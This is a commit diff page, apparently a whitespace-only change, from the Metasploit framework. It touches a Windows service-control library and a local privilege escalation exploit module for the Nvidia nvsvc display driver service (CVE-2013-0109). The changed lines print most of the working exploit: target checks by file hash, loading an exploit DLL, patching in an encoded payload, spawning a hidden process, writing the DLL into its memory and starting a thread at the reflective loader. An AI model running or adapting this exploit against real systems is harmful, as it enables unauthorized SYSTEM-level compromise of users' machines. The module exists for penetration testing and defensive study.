parent
5eca4714c2
commit
819ba30a33
|
@ -292,7 +292,7 @@ module Services
|
||||||
# Now to grab a handle to the service.
|
# Now to grab a handle to the service.
|
||||||
# Thank you, Wine project for defining the DELETE constant since it,
|
# Thank you, Wine project for defining the DELETE constant since it,
|
||||||
# and all its friends, are missing from the MSDN docs.
|
# and all its friends, are missing from the MSDN docs.
|
||||||
# #define DELETE 0x00010000
|
# #define DELETE 0x00010000
|
||||||
handle = adv.OpenServiceA(manager, name, 0x10000)
|
handle = adv.OpenServiceA(manager, name, 0x10000)
|
||||||
if (handle["return"] == 0)
|
if (handle["return"] == 0)
|
||||||
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
|
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
|
||||||
|
@ -312,7 +312,7 @@ module Services
|
||||||
#
|
#
|
||||||
# @param (see #service_start)
|
# @param (see #service_start)
|
||||||
#
|
#
|
||||||
# @return {} representing lpServiceStatus
|
# @return {} representing lpServiceStatus
|
||||||
#
|
#
|
||||||
# @raise (see #service_start)
|
# @raise (see #service_start)
|
||||||
#
|
#
|
||||||
|
|
|
@ -22,40 +22,40 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(update_info(info, {
|
super(update_info(info, {
|
||||||
'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
|
'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can
|
The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can
|
||||||
interact with the service. The service has a stacked based buffer overflow as a result
|
interact with the service. The service has a stacked based buffer overflow as a result
|
||||||
of a memmove operation.
|
of a memmove operation.
|
||||||
|
|
||||||
N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr!
|
N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr!
|
||||||
|
|
||||||
This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
|
This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
|
||||||
It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012.
|
It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'Peter Wintersmith', # Original exploit
|
'Peter Wintersmith', # Original exploit
|
||||||
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration
|
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration
|
||||||
],
|
],
|
||||||
'Arch' => ARCH_X86_64,
|
'Arch' => ARCH_X86_64,
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'SessionTypes' => [ 'meterpreter' ],
|
'SessionTypes' => [ 'meterpreter' ],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => 'thread',
|
'EXITFUNC' => 'thread',
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Automatic', { } ]
|
[ 'Automatic', { } ]
|
||||||
],
|
],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 2048,
|
'Space' => 2048,
|
||||||
'DisableNops' => true
|
'DisableNops' => true
|
||||||
},
|
},
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'CVE', '2013-0109' ],
|
[ 'CVE', '2013-0109' ],
|
||||||
[ 'OSVDB', '88745' ],
|
[ 'OSVDB', '88745' ],
|
||||||
|
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
rescue RuntimeError => e
|
rescue RuntimeError => e
|
||||||
print_error("Unable to retrieve service status")
|
print_error("Unable to retrieve service status")
|
||||||
end
|
end
|
||||||
|
|
||||||
if sysinfo['Architecture'] =~ /WOW64/i
|
if sysinfo['Architecture'] =~ /WOW64/i
|
||||||
# Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!)
|
# Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!)
|
||||||
return Exploit::CheckCode::Detected
|
return Exploit::CheckCode::Detected
|
||||||
else
|
else
|
||||||
path = svc['Command'].strip
|
path = svc['Command'].strip
|
||||||
end
|
end
|
||||||
|
|
||||||
begin
|
begin
|
||||||
hash = client.fs.file.md5(path).unpack('H*').first
|
hash = client.fs.file.md5(path).unpack('H*').first
|
||||||
rescue Rex::Post::Meterpreter::RequestError => e
|
rescue Rex::Post::Meterpreter::RequestError => e
|
||||||
|
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
if vuln_hashes.include?(hash)
|
if vuln_hashes.include?(hash)
|
||||||
vprint_good("Hash '#{hash}' is listed as vulnerable")
|
vprint_good("Hash '#{hash}' is listed as vulnerable")
|
||||||
return Exploit::CheckCode::Vulnerable
|
return Exploit::CheckCode::Vulnerable
|
||||||
else
|
else
|
||||||
vprint_status("Hash '#{hash}' is not recorded as vulnerable")
|
vprint_status("Hash '#{hash}' is not recorded as vulnerable")
|
||||||
return Exploit::CheckCode::Detected
|
return Exploit::CheckCode::Detected
|
||||||
end
|
end
|
||||||
|
@ -115,20 +115,20 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def create_proc
|
def create_proc
|
||||||
windir = expand_path("%windir%")
|
windir = expand_path("%windir%")
|
||||||
cmd = "#{windir}\\system32\\notepad.exe"
|
cmd = "#{windir}\\system32\\notepad.exe"
|
||||||
return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
|
return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
|
||||||
end
|
end
|
||||||
|
|
||||||
def is_running?
|
def is_running?
|
||||||
begin
|
begin
|
||||||
status = service_status('nvsvc')
|
status = service_status('nvsvc')
|
||||||
return (status and status[:state] == 4)
|
return (status and status[:state] == 4)
|
||||||
rescue RuntimeError => e
|
rescue RuntimeError => e
|
||||||
print_error("Unable to retrieve service status")
|
print_error("Unable to retrieve service status")
|
||||||
return false
|
return false
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -147,40 +147,40 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
else
|
else
|
||||||
print_good("Service is running")
|
print_good("Service is running")
|
||||||
end
|
end
|
||||||
|
|
||||||
dll = ''
|
|
||||||
offset = nil
|
|
||||||
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
|
|
||||||
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
|
|
||||||
|
|
||||||
pay = payload.encoded
|
dll = ''
|
||||||
|
offset = nil
|
||||||
|
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
|
||||||
|
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
|
||||||
|
|
||||||
bo = dll.index('PAYLOAD:')
|
pay = payload.encoded
|
||||||
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
|
|
||||||
dll[bo, pay.length] = [pay].pack("a*")
|
|
||||||
|
|
||||||
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
|
bo = dll.index('PAYLOAD:')
|
||||||
|
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
|
||||||
|
dll[bo, pay.length] = [pay].pack("a*")
|
||||||
|
|
||||||
pe.exports.entries.each do |entry|
|
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
|
||||||
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
|
|
||||||
offset = pe.rva_to_file_offset( entry.rva )
|
|
||||||
break
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
print_error("No offset found") unless offset
|
pe.exports.entries.each do |entry|
|
||||||
|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
|
||||||
|
offset = pe.rva_to_file_offset( entry.rva )
|
||||||
|
break
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
new_pid = create_proc
|
print_error("No offset found") unless offset
|
||||||
|
|
||||||
if not new_pid
|
new_pid = create_proc
|
||||||
fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
|
|
||||||
end
|
|
||||||
|
|
||||||
vprint_status("Injecting payload into memory")
|
if not new_pid
|
||||||
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
|
fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
|
||||||
mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
|
end
|
||||||
host_process.memory.protect(mem)
|
|
||||||
host_process.memory.write(mem, dll)
|
vprint_status("Injecting payload into memory")
|
||||||
|
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
|
||||||
|
mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
|
||||||
|
host_process.memory.protect(mem)
|
||||||
|
host_process.memory.write(mem, dll)
|
||||||
print_status("Executing exploit...")
|
print_status("Executing exploit...")
|
||||||
host_process.thread.create(mem+offset)
|
host_process.thread.create(mem+offset)
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue